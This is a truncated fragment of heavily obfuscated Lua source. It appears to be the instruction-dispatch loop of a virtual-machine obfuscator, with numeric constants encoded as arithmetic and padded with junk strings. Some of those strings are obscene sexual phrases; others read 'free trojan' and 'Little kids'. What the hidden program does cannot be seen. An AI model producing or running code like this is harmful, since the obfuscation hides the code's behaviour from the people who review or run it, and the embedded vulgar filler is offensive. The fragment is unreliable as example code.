e[(-52+0x3a)]()end),[(266/(-64+0xc5))]=(function(n)local d=e[(1080/0xb4)]()local n=''local e=1 for _=1,#d do e=(e+s)%o n=Q(n,K((M(d:sub(_,_))+e)%a))end return n end)};local d=e[(-#[[Little kids]]+(0x3d-49))]()for d=1,d do local e=e[(34+-0x20)]();local l;local e=n[e%(((-0x27f6/110)+-#[[187 ist die gang]])+153)];_[d]=e and e({});end;for a=1,e[(50/0x32)]()do local n=e[(0x19e/207)]();if(e[(0x19-(106-0x55))](n,l,i)==E)then local o=e[(-#'test 123'+(143-(188+-0x39)))](n,k,v);local d=e[(0x33+-47)](n,N,k+N);local n={e[(-38+0x29)](),e[(273/(-78+0xa9))](),nil,nil};local x={[(-0x60+96)]=function()n[w]=e[(0x80-125)]();n[j]=e[(-#"no thanks"+(0x324/67))]();end,[((41-0x1f)+-#[[no thanks]])]=function()n[u]=e[((26+-0x10)+-#[[no thanks]])]();end,[(-0x2f+49)]=function()n[f]=e[(-#[[This is working now]]+(3460/0xad))]()-(k^O)end,[(0xa5/55)]=function()n[h]=e[(219/0xdb)]()-(k^O)n[j]=e[(((765+-0x11)+-#'me big peepee')/0xf5)]();end};x[o]();if(e[(0x33+-47)](d,i,l)==i)then n[c]=_[n[b]]end if(e[(0x1f-27)](d,k,k)==l)then n[w]=_[n[h]]end if(e[((100-0x4d)+-#"This is working now")](d,v,v)==i)then n[H]=_[n[H]]end r[a]=n;end end;for e=i,e[(0x1d/29)]()do x[e-i]=P();end;t[3]=e[(332/0xa6)]();return t;end;local function E(e,N,s)local _=e[k];local n=e[v];local e=e[l];return(function(...)local K={};local o=e;local O={};local M=_;local P={...};local V=V local y=G('#',...)-i;local _={};local v=-i;local a=n;local n=l;for e=0,y do if(e>=a)then K[e-a]=P[e+i];else _[e]=P[e+l];end;end;local e=y-a+l local e;local a;while true do e=o[n];a=e[(0x41-64)];d=(5314804)while a<=(0x23c/11)do d=-d d=(4384224)while((0x8e-98)+-#'I like gargling cum')>=a do d=-d d=(8955864)while a<=((0x46a1/123)-0x87)do d=-d d=(2373449)while(-#[[big hard cock]]+(2340/0x82))>=a do d=-d d=(11549278)while(-0x15+23)>=a do d=-d d=(7488800)while(-#[[free trojan]]+(-71+0x52))>=a do d=-d n=e[f];break;end while 2035==(d)/(((0xf3c+-122)+-98))do d=(8414260)while((72+-0x37)+-#[[187 ist die gang]])<a do d=-d _[e[c]]=#_[e[u]];break end while(d)/((303588/0x51))==2245 do _[e[r]]=_[e[p]][_[e[H]]];break end;break;end break;end while(d)/((463858/0x76))==2938 do d=(3828500)while(19+-0x10)>=a do d=-d local n=e[r]_[n](I(_,n+i,e[p]))break;end while 3875==(d)/((0x833-1111))do d=(704304)while a>(-#'test123'+(2596/0xec))do d=-d _[e[g]]=_[e[x]];break end while 268==(d)/((5380-0xac0))do local d=e[t];local n=_[e[h]];_[d+1]=n;_[d]=n[e[T]];break end;break;end break;end break;end while(d)/((0x9e3+-30))==949 do d=(5411700)while a<=(1696/0xd4)do d=-d d=(1415895)while(0x8a/23)>=a do d=-d _[e[b]]=e[x];break;end while 795==(d)/((-0x35+1834))do d=(6193800)while(-#'free trojan'+(0xf30/216))<a do d=-d local d=e[c];local n=_[e[f]];_[d+1]=n;_[d]=n[e[L]];break end while 2294==(d)/((623700/0xe7))do if(_[e[c]]==_[e[F]])then n=n+i;else n=e[p];end;break end;break;end break;end while(d)/((0x1446-2613))==2100 do d=(11800948)while(0x42+-56)>=a do d=-d d=(99031)while((-0x17+156)+-124)<a do d=-d local d;local a;_[e[g]]={};n=n+l;e=o[n];_[e[c]]=s[e[u]];n=n+l;e=o[n];_[e[t]]=_[e[w]][e[F]];n=n+l;e=o[n];_[e[m]]=_[e[u]][e[j]];n=n+l;e=o[n];_[e[g]]=_[e[u]][e[j]];n=n+l;e=o[n];_[e[t]]=e[h];n=n+l;e=o[n];a=e[p];d=_[a]for e=a+1,e[B]do d=d.._[e];end;_[e[t]]=d;n=n+l;e=o[n];_[e[b]][e[w]]=_[e[F]];n=n+l;e=o[n];_[e[g]]={};n=n+l;e=o[n];_[e[b]]={};break end while 593==(d)/((278+-0x6f))do local o=e[r];local a=e[T];local d=o+2 local o={_[o](_[o+1],_[d])};for e=1,a do _[d+e]=o[e];end;local o=o[1]if o then _[d]=o n=e[u];else n=n+l;end;break end;break;end while(d)/((-#"amena jumping"+(-0x28+(-#'me big peepee'+(0x23690/37)))))==3062 do d=(40180)while(-#[[Little kids]]+(3894/0xb1))<a do d=-d local e=e[c]local d,n=V(_[e](_[e+i]))v=n+e-l local n=0;for e=e,v do n=n+l;_[e]=d[n];end;break end while(d)/(((6358/0xb)+-#[[Bong]]))==70 do local e=e[b]_[e]=_[e](_[e+i])break end;break;end break;end break;end break;end while(d)/(((6312-(6480-0xcdd))+-#[[free trojan]]))==2876 do d=(726250)while(-#[[test123]]+(125-0x64))>=a do d=-d d=(9713106)while(-48+0x3f)>=a do d=-d d=(3876096)while a<=((-100+0x7e)+-#[[me big peepee]])do d=-d _[e[c]]=N[e[u]];n=n+l;e=o[n];_[e[c]]=#_[e[u]];n=n+l;e=o[n];N[e[w]]=_[e[r]];n=n+l;e=o[n];_[e[g]]=N[e[x]];n=n+l;e=o[n];_[e[b]]=#_[e[h]];n=n+l;e=o[n];N[e[f]]=_[e[c]];n=n+l;e=o[n];do return end;break;end while 1236==(d)/((-#"amena jumping"+(802995/0xff)))do d=(1842957)while(2422/0xad)<a do d=-d local d=e[m];local o=_[d+2];local l=_[d]+o;_[d]=l;if(o>0)then if(l<=_[d+1])then n=e[w];_[d+3]=l;end elseif(l>=_[d+1])then n=e[w];_[d+3]=l;end break end while(d)/((3506-0x6e9))==1061 do local n=e[b]_[n](I(_,n+i,e[p]))break end;break;end break;end while 3627==(d)/((-#[[test]]+(0x77d36/183)))do d=(367710)while((-0x3f+((0x34e9/129)+-#"big hard cock"))+-#'amena jumping')>=a do d=-d if(_[e[b]]==_[e[j]])then n=n+i;else n=e[x];end;break;end while 3502==(d)/((0x92+-41))do d=(2516998)while(-0x52+99)<a do d=-d _[e[b]]={};break end while(d)/((-0x22+1232))==2101 do local d;_[e[c]]=_[e[w]][e[j]];n=n+l;e=o[n];_[e[m]]=s[e[p]];n=n+l;e=o[n];_[e[g]]=_[e[x]];n=n+l;e=o[n];d=e[m]_[d]=_[d](_[d+i])n=n+l;e=o[n];_[e[c]]=e[h];n=n+l;e=o[n];d=e[c]_[d]=_[d](I(_,d+l,e[x]))n=n+l;e=o[n];_[e[c]]=_[e[u]][e[T]];n=n+l;e=o[n];if(_[e[m]]~=_[e[L]])then n=n+i;else n=e[w];end;break end;break;end break;end break;end while(d)/((-#[[big hard cock]]+(102846/0x7a)))==875 do d=(649284)while a<=(-#[[test]]+(-52+0x4d))do d=-d d=(210368)while(141-0x7a)>=a do d=-d if not _[e[m]]then n=n+i;else n=e[w];end;break;end while 346==(d)/((55328/0x5b))do d=(573212)while a>(-#'Bong'+(1800/0x4b))do d=-d do return end;break end while 3049==(d)/((0x1df-291))do _[e[c]]=(e[h]~=0);break end;break;end break;end while(d)/((10614/(142-0x71)))==1774 do d=(169470)while(-#[[free trojan]]+(139-0x69))>=a do d=-d d=(336826)while(109-0x57)<a do d=-d local n=e[r]_[n]=_[n](I(_,n+l,e[p]))break end while(d)/((1085-0x252))==686 do _[e[c]]=E(M[e[x]],nil,s);break end;break;end while 126==(d)/((247480/0xb8))do d=(6878970)while a>(0x8d0/94)do d=-d _[e[g]]=s[e[w]];break end while(d)/((3967+-0x7c))==1790 do s[e[u]]=_[e[b]];break end;break;end break;end break;end break;end break;end while(d)/((-0x13+3532))==1248 do d=(6174468)while a<=(-35+0x49)do d=-d d=(9549708)while a<=(-#[[Bong]]+(126+-0x5b))do d=-d d=(1132716)while a<=((106-0x45)+-#[[no thanks]])do d=-d d=(15484166)while(0x8e-116)>=a do d=-d local d;_[e[b]]=e[p];n=n+l;e=o[n];d=e[r]_[d]=_[d](I(_,d+l,e[f]))n=n+l;e=o[n];_[e[r]]=_[e[u]][e[T]];n=n+l;e=o[n];_[e[t]]=_[e[h]][e[j]];n=n+l;e=o[n];_[e[t]]=_[e[u]][e[L]];n=n+l;e=o[n];_[e[t]]=_[e[w]][e[H]];n=n+l;e=o[n];d=e[m]_[d]=_[d](_[d+i])n=n+l;e=o[n];_[e[g]]=_[e[h]][e[H]];n=n+l;e=o[n];_[e[t]]=e[w];n=n+l;e=o[n];d=e[m]_[d]=_[d](_[d+i])break;end while(d)/((0x1e1e-3913))==4078 do d=(1047060)while a>(-82+0x6d)do d=-d _[e[c]][e[x]]=e[j];break end while 554==(d)/((0x5dab6/203))do local e=e[t]_[e]=_[e](_[e+i])break end;break;end break;end while(d)/((-#"test 123"+(39284/0x3d)))==1781 do d=(10842085)while((0x83-89)+-#"big hard cock")>=a do d=-d _[e[m]]={};break;end while 3335==(d)/((6599-0xd14))do d=(443688)while(-#'test'+(2992/0x58))<a do d=-d N[e[x]]=_[e[c]];break end while 2641==(d)/((0x100+-88))do local d=e[p];local n=_[d]for e=d+1,e[j]do n=n.._[e];end;_[e[r]]=n;break end;break;end break;end break;end while 3129==(d)/((527996/(298+-0x7d)))do d=(7147140)while(88-0x36)>=a do d=-d d=(1606854)while a<=(-0x43+99)do d=-d _[e[m]]=_[e[x]]-_[e[B]];break;end while 1643==(d)/((0x7d8-1030))do d=(846798)while a>(-0x42+99)do d=-d local r=M[e[x]];local a;local d={};a=q({},{__index=function(n,e)local e=d[e];return e[1][e[2]];end,__newindex=function(_,e,n)local e=d[e]e[1][e[2]]=n;end;});for l=1,e[F]do n=n+i;local e=o[n];if e[(0x26-37)]==40 then d[l-1]={_,e[x]};else d[l-1]={N,e[u]};end;O[#O+1]=d;end;_[e[t]]=E(r,a,s);break end while 321==(d)/(((0x8c1d8/216)+-#"This is working now"))do local d=e[b];local l=_[d]local o=_[d+2];if(o>0)then if(l>_[d+1])then n=e[h];else _[d+3]=l;end elseif(l<_[d+1])then n=e[x];else _[d+3]=l;end break end;break;end break;end while(d)/(((0x15084/36)+-#"me big peepee"))==3003 do d=(3490983)while(-#"me big peepee"+(154-0x69))>=a do d=-d d=(3838659)while a>((206-0xa0)+-#[[free trojan]])do d=-d n=e[f];break end while(d)/((-#[[187 ist die gang]]+(0xa0c57/223)))==1307 do local e={_,e};e[i][e[k][b]]=e[l][e[k][B]]+e[i][e[k][h]];break end;break;end while 1151==(d)/((712755/0xeb))do d=(360072)while a>(0x23b3/247)do d=-d local a;local t;local d;_[e[r]]=s[e[h]];n=n+l;e=o[n];_[e[c]]=_[e[x]];n=n+l;e=o[n];d=e[c]_[d]=_[d](_[d+i])n=n+l;e=o[n];_[e[r]]=_[e[u]][e[L]];n=n+l;e=o[n];d=e[b]t={_[d](_[d+1])};a=0;for e=d,e[H]do a=a+l;_[e]=t[a];end n=n+l;e=o[n];n=e[w];break end while 216==(d)/((-#[[test123]]+(0x1dd5a/73)))do local a;local d;_[e[b]]=s[e[x]];n=n+l;e=o[n];d=e[g];a=_[e[x]];_[d+1]=a;_[d]=a[e[T]];n=n+l;e=o[n];_[e[b]]=e[u];n=n+l;e=o[n];d=e[g]_[d]=_[d](I(_,d+l,e[w]))n=n+l;e=o[n];d=e[g];a=_[e[p]];_[d+1]=a;_[d]=a[e[L]];n=n+l;e=o[n];_[e[g]]=_[e[h]];n=n+l;e=o[n];d=e[c]_[d]=_[d](I(_,d+l,e[p]))n=n+l;e=o[n];_[e[g]]={};n=n+l;e=o[n];_[e[g]][e[x]]=e[B];n=n+l;e=o[n];_[e[r]]=s[e[p]];break end;break;end break;end break;end break;end while 1836==(d)/((0x521ac/(15400/0x9a)))do d=(482346)while((113+((-0x19d4/174)+-#'I like gargling cum'))+-#[[free trojan]])>=a do d=-d d=(4736592)while a<=(199-0x9e)do d=-d d=(7324020)while a<=((-#[[test123]]+(-15088/0xb8))+0x80)do d=-d _[e[c]][e[f]]=_[e[L]];break;end while 2466==(d)/((6051-0xc09))do d=(6662344)while a>(3320/0x53)do d=-d local i;local a;local d;_[e[b]]=s[e[x]];n=n+l;e=o[n];d=e[m];a=_[e[p]];_[d+1]=a;_[d]=a[e[F]];n=n+l;e=o[n];_[e[m]]=e[x];n=n+l;e=o[n];d=e[t]_[d]=_[d](I(_,d+l,e[u]))n=n+l;e=o[n];a=e[x];i=_[a]for e=a+1,e[T]do i=i.._[e];end;_[e[m]]=i;n=n+l;e=o[n];_[e[r]][e[f]]=_[e[j]];n=n+l;e=o[n];_[e[r]]=e[x];n=n+l;e=o[n];_[e[m]]=s[e[h]];n=n+l;e=o[n];_[e[c]]=_[e[p]][e[j]];n=n+l;e=o[n];_[e[m]]=_[e[x]][e[j]];break end while(d)/(((-#[[amena jumping]]+(0x551c47/31))/66))==2444 do _[e[r]]=_[e[h]];break end;break;end break;end while(d)/((449834/0xfd))==2664 do d=(187480)while(-#[[Bong]]+(163+-0x74))>=a do d=-d d=(86970)while a>(0x9f-117)do d=-d _[e[r]]=_[e[f]]%e[F];break end while 30==(d)/((0x1725-3026))do local n=e[t];local d=_[n];for e=n+1,e[w]do S(d,_[e])end;break end;break;end while(d)/((-0x35+598))==344 do d=(2226879)while(0xcd-161)<a do d=-d _[e[g]]=(e[f]~=0);n=n+i;break end while 603==(d)/(((548192/(0x8a2c/239))+-#'Little kids'))do _[e[m]]=#_[e[f]];break end;break;end break;end break;end while(d)/((344-(31031/0x8f)))==3798 do d=(903740)while a<=(0x9d-109)do d=-d d=(13162797)while((-56+0x73)+-#[[big hard cock]])>=a do d=-d _[e[t]]=e[x];break;end while(d)/((0x1ec6-3957))==3357 do d=(308280)while a>(987/0x15)do d=-d _[e[r]]=N[e[h]];break end while 1468==(d)/((-#[[test123]]+(-0x74+333)))do if(_[e[t]]==e[H])then n=n+i;else n=e[h];end;break end;break;end break;end while(d)/((1302-0x2ab))==1460 do d=(2677696)while a<=((-0x7f+186)+-#'no thanks')do d=-d d=(488528)while a>(162-0x71)do d=-d if not _[e[c]]then n=n+i;else n=e[x];end;break end while 1607==(d)/((664-0x168))do local e={_,e};e[i][e[k][m]]=e[l][e[k][T]]+e[i][e[k][p]];break end;break;end while 2224==(d)/(((173240/0x8e)+-#"187 ist die gang"))do d=(3903322)while a>(0xd4-161)do d=-d _[e[c]]=_[e[u]][_[e[j]]];break end while 1741==(d)/((-0x73+2357))do _[e[t]][_[e[u]]]=_[e[T]];break end;break;end break;end break;end break;end break;end break;end while 1529==(d)/((-#"amena jumping"+(-18+0xdb3)))do d=(1669018)while a<=(0x4b90/(578-0x14a))do d=-d d=(4884882)while(7800/0x78)>=a do d=-d d=(158652)while(10266/0xb1)>=a do d=-d d=(4976712)while a<=(-#'test 123'+(177+-0x72))do d=-d d=(5466168)while(5724/(1296/0xc))>=a do d=-d N[e[h]]=_[e[t]];break;end while 1896==(d)/((0xbbc+-121))do d=(302736)while(-125+0xb3)<a do d=-d local n=e[b];local d=_[n];for e=n+1,e[p]do S(d,_[e])end;break end while(d)/((0x278-360))==1113 do _[e[t]]=_[e[f]]-_[e[L]];break end;break;end break;end while(d)/((-21+0x55d))==3681 do d=(7560865)while a<=(-#'test123'+(247-0xb8))do d=-d _[e[g]][_[e[x]]]=_[e[L]];break;end while 1985==(d)/((-79+0xf30))do d=(5249074)while a>((-#'no thanks'+(14346+-0x1e))/251)do d=-d local d;s[e[h]]=_[e[r]];n=n+l;e=o[n];_[e[m]]=s[e[p]];n=n+l;e=o[n];_[e[m]]=e[p];n=n+l;e=o[n];d=e[t]_[d](_[d+i])n=n+l;e=o[n];do return end;break end while(d)/((0xf0d-1979))==2801 do _[e[b]]=_[e[f]][e[F]];break end;break;end break;end break;end while(d)/((0x3b0-492))==351 do d=(7851956)while(-0x26+99)>=a do d=-d d=(394864)while a<=(((-#[[This is working now]]+(0x18e-217))-92)+-#[[Little kids]])do d=-d _[e[g]][e[x]]=e[T];break;end while 2146==(d)/((-82+0x10a))do d=(2993660)while(0x66+-42)<a do d=-d local a;local d;_[e[b]]={};n=n+l;e=o[n];_[e[m]][e[f]]=e[B];n=n+l;e=o[n];_[e[c]][e[x]]=e[T];n=n+l;e=o[n];_[e[t]][e[u]]=e[F];n=n+l;e=o[n];_[e[c]][e[f]]=e[L];n=n+l;e=o[n];_[e[b]][e[f]]=e[H];n=n+l;e=o[n];_[e[r]][e[f]]=_[e[T]];n=n+l;e=o[n];d=e[r];a=_[d];for e=d+1,e[w]do S(a,_[e])end;break end while(d)/((-#[[Bong]]+(0x10c40/58)))==2537 do local d;_[e[r]]=_[e[f]][e[B]];n=n+l;e=o[n];_[e[m]]=s[e[p]];n=n+l;e=o[n];_[e[c]]=_[e[w]];n=n+l;e=o[n];d=e[t]_[d]=_[d](_[d+i])n=n+l;e=o[n];_[e[r]]=e[u];n=n+l;e=o[n];d=e[t]_[d]=_[d](I(_,d+l,e[u]))n=n+l;e=o[n];_[e[m]]=_[e[f]][e[L]];break end;break;end break;end while 2716==(d)/((0xbffb/17))do d=(3832376)while a<=(0x2c8b/181)do d=-d d=(3179616)while a>(0x95+-87)do d=-d local n=e[c]local o={_[n](_[n+1])};local d=0;for e=n,e[B]do d=d+l;_[e]=o[d];end break end while(d)/((3037+-0x1a))==1056 do local v;local a;local t;local d;_[e[c]]=s[e[f]];n=n+l;e=o[n];_[e[r]]=_[e[u]][e[F]];n=n+l;e=o[n];d=e[g];t=_[e[h]];_[d+1]=t;_[d]=t[e[B]];n=n+l;e=o[n];_[e[r]]=_[e[p]];n=n+l;e=o[n];_[e[c]]=_[e[h]];n=n+l;e=o[n];d=e[c]_[d]=_[d](I(_,d+l,e[h]))n=n+l;e=o[n];d=e[r];t=_[e[w]];_[d+1]=t;_[d]=t[e[L]];n=n+l;e=o[n];d=e[r]_[d]=_[d](_[d+i])n=n+l;e=o[n];a={_,e};a[i][a[k][m]]=a[l][a[k][L]]+a[i][a[k][w]];n=n+l;e=o[n];_[e[m]]=_[e[u]]%e[j];n=n+l;e=o[n];d=e[m]_[d]=_[d](_[d+i])n=n+l;e=o[n];t=e[w];v=_[t]for e=t+1,e[T]do v=v.._[e];end;_[e[b]]=v;n=n+l;e=o[n];a={_,e};a[i][a[k][r]]=a[l][a[k][B]]+a[i][a[k][u]];n=n+l;e=o[n];_[e[g]]=_[e[x]]%e[j];break end;break;end while(d)/((0xabf+-97))==1444 do d=(4421500)while a>(0xaf+-111)do d=-d s[e[x]]=_[e[t]];n=n+l;e=o[n];_[e[b]]={};n=n+l;e=o[n];_[e[g]]={};n=n+l;e=o[n];s[e[w]]=_[e[c]];n=n+l;e=o[n];_[e[b]]=s[e[h]];n=n+l;e=o[n];if(_[e[r]]==e[H])then n=n+i;else n=e[p];end;break end while 1850==(d)/((-#'no thanks'+(0x9ce+(-111+0x0))))do local c;local a;local d;_[e[m]]=e[f];n=n+l;e=o[n];_[e[r]]=s[e[w]];n=n+l;e=o[n];_[e[g]]=s[e[h]];n=n+l;e=o[n];d=e[t];a=_[e[x]];_[d+1]=a;_[d]=a[e[j]];n=n+l;e=o[n];_[e[t]]=e[x];n=n+l;e=o[n];d=e[m]_[d]=_[d](I(_,d+l,e[p]))n=n+l;e=o[n];_[e[t]]=_[e[h]][e[L]];n=n+l;e=o[n];_[e[b]]=_[e[x]][e[L]];n=n+l;e=o[n];d=e[b]_[d]=_[d](_[d+i])n=n+l;e=o[n];a=e[w];c=_[a]for e=a+1,e[B]do c=c.._[e];end;_[e[g]]=c;break end;break;end break;end break;end break;end while(d)/(((3544-0x711)+-#"test"))==2822 do d=(3966253)while(201-0x82)>=a do d=-d d=(2801736)while((-0x59+164)+-#"test123")>=a do d=-d d=(5246233)while a<=(0x2b92/169)do d=-d local d;_[e[b]]={};n=n+l;e=o[n];_[e[r]][e[u]]=_[e[H]];n=n+l;e=o[n];_[e[g]][e[w]]=_[e[L]];n=n+l;e=o[n];_[e[t]][e[h]]=e[B];n=n+l;e=o[n];_[e[r]][e[h]]=_[e[j]];n=n+l;e=o[n];_[e[c]]=s[e[u]];n=n+l;e=o[n];_[e[r]]=_[e[p]];n=n+l;e=o[n];d=e[r]_[d](_[d+i])n=n+l;e=o[n];_[e[c]]=s[e[u]];n=n+l;e=o[n];_[e[c]]=s[e[f]];break;end while 1373==(d)/((-94+(477630/0x7a)))do d=(1123432)while a>(93+-0x1a)do d=-d local d=e[t]local o={_[d](_[d+1])};local n=0;for e=d,e[H]do n=n+l;_[e]=o[n];end break end while 778==(d)/(((1555+-0x62)+-#'me big peepee'))do local d;local a;local c;_[e[r]]=e[x];n=n+l;e=o[n];_[e[m]]=_[e[w]];n=n+l;e=o[n];_[e[g]]=e[f];n=n+l;e=o[n];c=e[x];a=_[c]for e=c+1,e[F]do a=a.._[e];end;_[e[t]]=a;n=n+l;e=o[n];_[e[g]][e[x]]=_[e[j]];n=n+l;e=o[n];_[e[t]][e[x]]=e[j];n=n+l;e=o[n];_[e[r]]=s[e[p]];n=n+l;e=o[n];_[e[t]]=e[u];n=n+l;e=o[n];d=e[t]_[d]=_[d](_[d+i])n=n+l;e=o[n];_[e[r]][e[u]]=_[e[L]];break end;break;end break;end while 872==(d)/((3319+-0x6a))do d=(1981197)while(-#'Bong'+(111+-0x26))>=a do d=-d _[e[m]]=E(M[e[u]],nil,s);break;end while 3519==(d)/((-#[[test 123]]+(-0x58+659)))do d=(4814908)while a>(158-0x58)do d=-d do return end;break end while 1436==(d)/(((-#[[This is working now]]+(0x3569-6885))-3416))do if(_[e[t]]~=_[e[F]])then n=n+i;else n=e[w];end;break end;break;end break;end break;end while(d)/((6214-0xc41))==1289 do d=(1888890)while((0xcc+-123)+-#[[test123]])>=a do d=-d d=(6396936)while a<=(171-0x63)do d=-d _[e[b]]=_[e[f]][e[F]];break;end while 3016==(d)/((((0x64be87/13)/0xef)+-#"Bong"))do d=(2840355)while((243+-0x6a)+-64)<a do d=-d local d;local a;local x,c;local d;_[e[m]]=s[e[w]];n=n+l;e=o[n];_[e[b]]=(e[w]~=0);n=n+l;e=o[n];d=e[r]x,c=V(_[d](_[d+i]))v=c+d-l a=0;for e=d,v do a=a+l;_[e]=x[a];end;n=n+l;e=o[n];d=e[t]x={_[d](I(_,d+1,v))};a=0;for e=d,e[T]do a=a+l;_[e]=x[a];end n=n+l;e=o[n];n=e[f];break end while 1143==(d)/((-0x58+2573))do if _[e[t]]then n=n+l;else n=e[x];end;break end;break;end break;end while 797==(d)/((0x550e6/147))do d=(5516784)while(-#"amena jumping"+(21716/0xf4))>=a do d=-d d=(3246972)while a>(0x9c+-81)do d=-d _[e[g]]=(e[x]~=0);n=n+i;break end while(d)/(((0x1dfa-3852)+-#[[free trojan]]))==852 do do return _[e[g]]end break end;break;end while(d)/(((0xd1ab0/226)+-#[[free trojan]]))==1456 do d=(1260270)while(0xd8-139)<a do d=-d local a=M[e[u]];local l;local d={};l=q({},{__index=function(n,e)local e=d[e];return e[1][e[2]];end,__newindex=function(_,e,n)local e=d[e]e[1][e[2]]=n;end;});for l=1,e[B]do n=n+i;local e=o[n];if e[(0x3c-59)]==40 then d[l-1]={_,e[x]};else d[l-1]={N,e[h]};end;O[#O+1]=d;end;_[e[r]]=E(a,l,s);break end while(d)/(((0x11de-2344)+-#'This is working now'))==570 do for e=e[c],e[h]do _[e]=nil;end;break end;break;end break;end break;end break;end break;end while(d)/((0x4e5-655))==2791 do d=(2018448)while((0x1c08/69)+-#[[amena jumping]])>=a do d=-d d=(4047156)while a<=((280-0xb9)+-#[[Little kids]])do d=-d d=(2274060)while a<=(0x5b2/18)do d=-d d=(11153086)while(0x78+-41)>=a do d=-d local d;local a;local c,u;local k;local d;_[e[m]]=s[e[f]];n=n+l;e=o[n];_[e[t]]=s[e[f]];n=n+l;e=o[n];_[e[b]]=_[e[x]][e[L]];n=n+l;e=o[n];_[e[r]]=_[e[w]][e[L]];n=n+l;e=o[n];_[e[t]]=_[e[h]][e[T]];n=n+l;e=o[n];d=e[t];k=_[e[x]];_[d+1]=k;_[d]=k[e[B]];n=n+l;e=o[n];d=e[m]c,u=V(_[d](_[d+i]))v=u+d-l a=0;for e=d,v do a=a+l;_[e]=c[a];end;n=n+l;e=o[n];d=e[r]c={_[d](I(_,d+1,v))};a=0;for e=d,e[B]do a=a+l;_[e]=c[a];end n=n+l;e=o[n];n=e[w];break;end while 3577==(d)/((-0x35+3171))do d=(797040)while a>(0xcd0/41)do d=-d _[e[r]]=s[e[w]];break end while(d)/((1517-0x30b))==1080 do _[e[b]][e[w]]=_[e[T]];break end;break;end break;end while(d)/((0xf00+-75))==604 do d=(2196784)while a<=(0x9d+-75)do d=-d _[e[t]]=_[e[h]]%e[j];break;end while(d)/((-0x7a+946))==2666 do d=(10335492)while a>(16517/0xc7)do d=-d local n=e[t]_[n]=_[n](I(_,n+l,e[x]))break end while(d)/((197163/0x39))==2988 do _[e[c]]=(e[u]~=0);break end;break;end break;end break;end while 2334==(d)/((0xde5-1823))do d=(6257346)while a<=(-105+0xc0)do d=-d d=(329840)while(287-0xca)>=a do d=-d local n=e[t]local o={_[n](I(_,n+1,v))};local d=0;for e=n,e[T]do d=d+l;_[e]=o[d];end break;end while 1736==(d)/((45980/0xf2))do d=(15795441)while a>((22860/0xfe)+-#[[Bong]])do d=-d s[e[f]]=_[e[b]];break end while(d)/((-117+(-#'Little kids'+(534400/0x80))))==3903 do local d=e[r];local a=e[H];local o=d+2 local d={_[d](_[d+1],_[o])};for e=1,a do _[o+e]=d[e];end;local d=d[1]if d then _[o]=d n=e[u];else n=n+l;end;break end;break;end break;end while 2489==(d)/(((0x2857-5188)-2625))do d=(1345827)while(0x4eeb/227)>=a do d=-d d=(4458663)while((0x207c/84)+-#'free trojan')<a do d=-d if(_[e[r]]==e[T])then n=n+i;else n=e[h];end;break end while 1553==(d)/((0x745aa/166))do local d;_[e[c]]=s[e[u]];n=n+l;e=o[n];_[e[r]]=_[e[p]];n=n+l;e=o[n];d=e[c]_[d]=_[d](_[d+i])n=n+l;e=o[n];_[e[g]]=_[e[x]][e[H]];n=n+l;e=o[n];d=e[r]_[d]=_[d](_[d+i])n=n+l;e=o[n];if(_[e[c]]==e[L])then n=n+i;else n=e[x];end;break end;break;end while 3373==(d)/((0x17abd/243))do d=(95420)while(-#[[me big peepee]]+(-38+0x8d))<a do d=-d if(_[e[r]]~=e[F])then n=n+i;else n=e[f];end;break end while 3670==(d)/((152+-0x7e))do local n=e[r]local o={_[n](I(_,n+1,v))};local d=0;for e=n,e[L]do d=d+l;_[e]=o[d];end break end;break;end break;end break;end break;end while 786==(d)/((341544/0x85))do d=(304440)while(-0x32+(0x19e-266))>=a do d=-d d=(11469645)while a<=(-#'Little kids'+(-91+0xc4))do d=-d d=(1104750)while(-#"test"+(-0x66+198))>=a do d=-d local e=e[t]_[e](_[e+i])break;end while(d)/((-#'I like gargling cum'+((953-0x211)+-0x1e)))==2946 do d=(6340400)while a>(-#[[me big peepee]]+(-0x2f+(-70+0xdf)))do d=-d local e=e[b]_[e](_[e+i])break end while(d)/((165584/0x4f))==3025 do _[e[b]]=N[e[f]];break end;break;end break;end while 2871==(d)/((4100+-0x69))do d=(6001776)while a<=(253-(-106+0x107))do d=-d d=(7707375)while a>(305-0xd2)do d=-d local i;local a;local d;_[e[b]]=e[h];n=n+l;e=o[n];_[e[r]]=e[f];n=n+l;e=o[n];_[e[g]]=#_[e[x]];n=n+l;e=o[n];_[e[r]]=e[x];n=n+l;e=o[n];d=e[r];a=_[d]i=_[d+2];if(i>0)then if(a>_[d+1])then n=e[w];else _[d+3]=a;end elseif(a<_[d+1])then n=e[p];else _[d+3]=a;end break end while(d)/((2072+(-0x5f+12)))==3875 do do return _[e[b]]end break end;break;end while 2526==(d)/((0x97b+-51))do d=(296555)while(-93+(-#'Little kids'+(0x1a9-224)))<a do d=-d local e=e[g]local d,n=V(_[e](_[e+i]))v=n+e-l local n=0;for e=e,v do n=n+l;_[e]=d[n];end;break end while 229==(d)/((205905/0x9f))do local d=e[b];local o=_[d+2];local l=_[d]+o;_[d]=l;if(o>0)then if(l<=_[d+1])then n=e[x];_[d+3]=l;end elseif(l>=_[d+1])then n=e[h];_[d+3]=l;end break end;break;end break;end break;end while(d)/((-79+0x3c4))==344 do d=(5077707)while(-#[[187 ist die gang]]+(0x5994/196))>=a do d=-d d=(6414052)while(0x106-163)>=a do d=-d local d=e[c];local l=_[d]local o=_[d+2];if(o>0)then if(l>_[d+1])then n=e[f];else _[d+3]=l;end elseif(l<_[d+1])then n=e[h];else _[d+3]=l;end break;end while 3827==(d)/((3374-0x6a2))do d=(1679736)while(226+-0x7e)<a do d=-d for e=e[t],e[f]do _[e]=nil;end;break end while(d)/((0x18d3-3227))==537 do if _[e[r]]then n=n+l;else n=e[h];end;break end;break;end break;end while 2201==(d)/((0x1274-2417))do d=(3812930)while((0x213-296)-0x84)>=a do d=-d d=(3506088)while(0x88+-34)<a do d=-d if(_[e[r]]~=_[e[T]])then n=n+i;else n=e[u];end;break end while(d)/(((0xd98+-99)+-#'big hard cock'))==1041 do local d;local a;local k,m;local u;local d;_[e[b]]=_[e[f]];n=n+l;e=o[n];_[e[r]]=s[e[x]];n=n+l;e=o[n];_[e[t]]=s[e[x]];n=n+l;e=o[n];_[e[c]]=_[e[p]][e[H]];n=n+l;e=o[n];_[e[r]]=_[e[h]][e[B]];n=n+l;e=o[n];_[e[g]]=_[e[f]][e[j]];n=n+l;e=o[n];d=e[g];u=_[e[x]];_[d+1]=u;_[d]=u[e[j]];n=n+l;e=o[n];d=e[c]k,m=V(_[d](_[d+i]))v=m+d-l a=0;for e=d,v do a=a+l;_[e]=k[a];end;n=n+l;e=o[n];d=e[r]k={_[d](I(_,d+1,v))};a=0;for 